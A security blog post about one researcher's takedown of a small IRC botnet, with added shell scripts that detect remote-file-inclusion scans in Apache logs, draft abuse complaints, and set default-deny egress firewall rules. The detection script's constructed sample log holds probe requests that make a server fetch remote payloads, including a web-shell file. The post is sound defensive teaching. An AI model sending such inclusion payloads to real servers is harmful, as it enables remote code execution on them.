web application security lab

Botnet Destruction - A Drama

I got an email from B10m today pointing me to a very interesting blog post he wrote about destroying a botnet. It is worth reading because he takes it from the very first step (detecting the attack) through logging into the IRC server, communicating with the ops, trying to get himself banned so that his server's IP could no longer talk to the IRC server, and finally taking down the individual servers that were hosting the files as well as the IRC server itself.

Although it was a relatively small botnet in the grand scheme of things, it's still pretty interesting to see this happen. I have always wondered whether the operators simply tell the bots to listen to another IRC server elsewhere and log off, but it's still a fascinating story. The economics of writing a robot that follows the links and automatically submits complaints to abuse@ the ISP in question aren't that bad. If there were money in it, I'm sure other people would be interested in doing this; beyond that it's an oddity. It might even be worth writing an Apache module to do this on your behalf, since the botnets might stop scanning your network for fear of reprisal.
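As an added example of the first two steps (detecting the scans and drafting the complaints), here is a small shell script; it is not from the post or from B10m's tool. It assumes the scans pass a full URL as a query-string value (remote-file-inclusion style probes), which the post hints at but does not state; the access log is constructed, and the whois lookup for each hosting provider is left to the reader so the script runs offline.

```shell
#!/bin/sh
# Added example, not from the post or from B10m's own tool: find scanning bots and
# the hosts serving their payloads in an Apache access log, then draft one abuse
# complaint per hosting host. Assumption: the scans pass a full URL as a
# query-string value (remote-file-inclusion style probes), which the post hints
# at but does not state. The log below is constructed; whois lookups are left
# to the reader so the script runs offline.

# Constructed sample log (Apache combined format). Three lines are probes from two
# bots fetching payloads off two hosts; the fourth is an ordinary visitor.
sample_log() {
    cat <<'EOF'
203.0.113.5 - - [10/Mar/2007:10:01:02 +0000] "GET /index.php?page=http://198.51.100.7/cmd.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.5 - - [10/Mar/2007:10:01:03 +0000] "GET /forum/main.php?inc=http://198.51.100.7/cmd.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
192.0.2.44 - - [10/Mar/2007:10:05:11 +0000] "GET /news.php?id=http://203.0.113.200/~tmp/r57.txt HTTP/1.1" 200 498 "-" "Mozilla/4.0"
198.51.100.23 - - [10/Mar/2007:10:06:00 +0000] "GET /about.html HTTP/1.1" 200 1200 "http://example.com/" "Mozilla/5.0"
EOF
}

# Read a log on stdin; print "<bot ip> <payload url>" for every request whose
# query string carries a value beginning with http:// or https://.
extract_probes() {
    awk '
    {
        ip = $1; req = $7                 # $7 is the request target in combined format
        q = index(req, "?")
        if (q == 0) next
        n = split(substr(req, q + 1), kv, "&")
        for (i = 1; i <= n; i++) {
            eq = index(kv[i], "=")
            if (eq == 0) continue
            val = substr(kv[i], eq + 1)
            if (val ~ /^https?:\/\//) print ip, val
        }
    }'
}

# Host part of a URL: drop the scheme, then everything from the first / or ?.
url_host() {
    printf '%s\n' "$1" | sed -e 's|^http://||' -e 's|^https://||' -e 's|[/?].*||'
}

# Portable line count (wc -l pads with spaces on some systems).
count_lines() {
    awk 'END { print NR }'
}

# Read a log on stdin; print one complaint draft per payload host, listing the
# bot IPs and the exact URLs fetched as evidence.
draft_complaints() {
    extract_probes | sort -u | while read -r bot url; do
        printf '%s %s %s\n' "$(url_host "$url")" "$bot" "$url"
    done | sort | awk '
    $1 != cur {
        if (cur != "") print ""
        cur = $1
        print "To: abuse contact for " cur " (find it with: whois " cur ")"
        print "Subject: malicious file hosted on " cur " is being used in web scans"
        print "Evidence (bot IP, URL it made my server fetch):"
    }
    { print "  " $2 "  " $3 }'
}

sample_log | draft_complaints
```

Run it against a real log with `extract_probes < /var/log/apache2/access.log` to see what your server is being asked to fetch; grouping by payload host rather than by bot IP is deliberate, because one hosting provider can cut off many bots at once, while complaining about each infected client individually is the slow path B10m describes.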

2 Responses to “Botnet Destruction - A Drama”

  1. B10m Says:

    First of all, thanks for the plug!

    I’ve looked into the possibility of automating this, but due to the awkward includes of other files, it’d be hard to fully automate (I made a rough draft of a complaint for this specific case, like logging into the IRC server, seeing which IPs were infected, looking up the sysadmins’ mail addresses, etc.).

    Of course, these script kiddies found a new host to launch their attacks from, but by now, their botnet is crumbling again ;-)

    I’d love to see other people’s solutions for automating complaints though!

  2. id Says:

    Much easier to just block outbound connections from your host on the firewall. Why would your webserver ever have a reason to connect to an IRC server… Egress filtering is your friend.
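The egress filtering id recommends, as an added example that is not part of the post or the comment: a default-deny OUTPUT chain for a web server, written as iptables rules. The server only needs replies to inbound connections, DNS to its resolver and mail to its relay; everything else, an IRC connect-back on 6667 included, is logged and rejected. The resolver and relay addresses (10.0.0.53 and 10.0.0.25) are placeholders.

```shell
#!/bin/sh
# Added example, not part of the post or the comment above: a default-deny
# egress policy for a web server, as iptables rules. Assumed addresses:
# RESOLVER 10.0.0.53 and MAIL_RELAY 10.0.0.25 are placeholders; set them for
# your network.
RESOLVER=${RESOLVER:-10.0.0.53}
MAIL_RELAY=${MAIL_RELAY:-10.0.0.25}

# The weak setting this replaces is the stock policy, "-P OUTPUT ACCEPT" with
# no OUTPUT rules, under which a compromised web process can reach any host on
# any port (an IRC server on 6667, a payload host, anything).

# Print the hardened OUTPUT chain, one iptables argument list per line, so it
# can be reviewed before it is applied.
egress_rules() {
    cat <<EOF
-P OUTPUT DROP
-A OUTPUT -o lo -j ACCEPT
-A OUTPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
-A OUTPUT -p udp -d $RESOLVER --dport 53 -j ACCEPT
-A OUTPUT -p tcp -d $RESOLVER --dport 53 -j ACCEPT
-A OUTPUT -p tcp -d $MAIL_RELAY --dport 25 -j ACCEPT
-A OUTPUT -m limit --limit 5/min -j LOG --log-prefix egress-denied:
-A OUTPUT -j REJECT --reject-with icmp-port-unreachable
EOF
}

# Number of rules that open something; a sanity check when editing the list.
accept_rule_count() {
    egress_rules | grep -c -- '-j ACCEPT'
}

# Apply the rules. Refuses to run unless root and iptables is installed, and
# only touches the OUTPUT chain so existing INPUT rules are left alone.
apply_egress_rules() {
    [ "$(id -u)" -eq 0 ] || { echo "run as root" >&2; return 1; }
    command -v iptables >/dev/null 2>&1 || { echo "iptables not found" >&2; return 1; }
    iptables -F OUTPUT
    egress_rules | while read -r line; do
        # shellcheck disable=SC2086
        iptables $line
    done
}

egress_rules
```

The ESTABLISHED,RELATED rule is what keeps the web server answering its clients: their connections are inbound, so the replies match conntrack state and never need an explicit outbound allow. Anything the server must initiate itself (a database on another box, a package mirror) gets its own narrow `-d host --dport port` line; the LOG rule before the final REJECT is the cheap detection that id's approach gives you for free, since a bot trying to phone home shows up as an `egress-denied:` entry in the kernel log.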
